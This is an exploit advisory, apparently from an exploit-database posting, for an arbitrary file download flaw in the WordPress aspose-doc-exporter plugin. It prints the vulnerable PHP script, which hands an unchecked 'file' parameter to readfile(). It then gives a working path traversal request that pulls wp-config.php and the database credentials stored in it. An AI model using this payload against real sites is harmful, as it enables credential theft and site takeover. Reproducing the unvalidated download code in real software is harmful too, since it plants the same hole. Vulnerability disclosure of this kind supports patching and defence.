|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|-------------------------------------------------------------------------|
| [+] Exploit Title: Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability |
| [+] Exploit Author: Ashiyane Digital Security Team |
| [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/
| [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip
| [+] Tested on: Windows,Linux |
| [+] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
| [+] Exploit: |
| [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php |
| [+] Vulnerable Code :
<?php
$file = $_GET['file'];
$file_arr = explode('/',$file);
$file_name = $file_arr[count($file_arr) - 1];
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file_name.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>
| [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address]
| [+]
| [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
|-------------------------------------------------------------------------|
|*||*||*||*||*||*||*||*||*||*||*||*||*